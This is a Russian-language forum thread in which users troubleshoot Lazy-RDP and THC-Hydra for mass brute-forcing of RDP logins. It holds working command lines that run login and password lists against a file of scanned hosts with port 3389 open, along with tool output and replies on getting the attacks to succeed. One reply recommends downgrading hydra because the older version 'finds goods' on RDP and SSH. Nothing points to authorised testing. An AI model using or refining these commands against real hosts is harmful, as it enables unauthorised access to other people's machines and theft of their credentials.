help hydra and Lazy-RDP

Discussion in 'Болталка' started by x10, 4 Sep 2017.

  1. x10

    x10 Well-Known Member

    Joined:
    12 Oct 2016
    Messages:
    306
    Likes Received:
    1,246
    Reputations:
    1
    Хай! Lazy-RDP проблема указываваю ключи к логинам и паролям, программа срузу же говорит что пароль не найден! Вот логи
    $ rdp_login host=FILE0 port=3389 user=FILE1 password=FILE2 port=FILE3 0=open3389 1=/home/Lazy-RDP/login.txt 2=/home/Lazy-RDP/pass.txt -t 50 --max-retries=2 --rate-limit=1 -x ignore:code=1 -x ignore:code=-11 -x ignore:fgrep=FAIL,size=600-654 -l /home/Lazy-RDP/Results
    Если указываю 1 логин и файл с паролями то полет нормальный, подскажите в чем проблема.

    И еще один вопрос ввожу ключи:
    hydra -L /root/Desktop/login -P /root/Desktop/pass2 -M /root/Desktop/IPs.txt -vV rdp
    Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (http://www.thc.org/thc-hydra) starting at 2017-09-04 12:05:35
    [WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
    [WARNING] the rdp module is currently reported to be unreliable, most likely against new Windows version. Please test, report - and if possible, fix.
    Ошибка сегментирования ЗДЕСЬ ЧЕГО НЕ ТАК?
     
    #1 x10, 4 Sep 2017
    Last edited: 4 Sep 2017
  2. getdrive

    getdrive New Member

    Joined:
    13 Sep 2017
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Обновите Lazy-RDP до последней версии (v.1.17). Баг исправлен.
     
  3. sliverbog

    sliverbog New Member

    Joined:
    13 Sep 2017
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    скан в норме.брут выдает такое-
    cat: /root/Results/RUNTIME.log: Нет такого файла или каталога
    help!sos!
     
  4. getdrive

    getdrive New Member

    Joined:
    13 Sep 2017
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    • судя по ошибке, вы запускаете скрипт не из папки Lazy-RDP. В вашем случае, путь должен быть таким "/root/Lazy-RDP/Results/RUNTIME.log" Перейдите в папку и запустите повторно. Обновите версию) В актуальной версии запуск происходит через ./start.
     
    #4 getdrive, 13 Sep 2017
    Last edited: 15 Sep 2017
  5. Zelenka

    Zelenka New Member

    Joined:
    19 Aug 2016
    Messages:
    6
    Likes Received:
    2
    Reputations:
    0
    Вероятно RDP модуль гидры не поддерживает версию RDP протокола. Такое замечалось у гидры более ранних версий.
     
  6. sudosu

    sudosu New Member

    Joined:
    14 Aug 2018
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Да, это так. Специально настроил в своем компуктере rdp, попробовал и ничего. Потом запустил с флешки parrot os, в котором изначально установлена версия hydra 8.3. В общем решил попробовать эту версию и все нормально, гуды находит, rdp и ssh брутит. Так что качай 8.3 и пробуй.
     
Loading...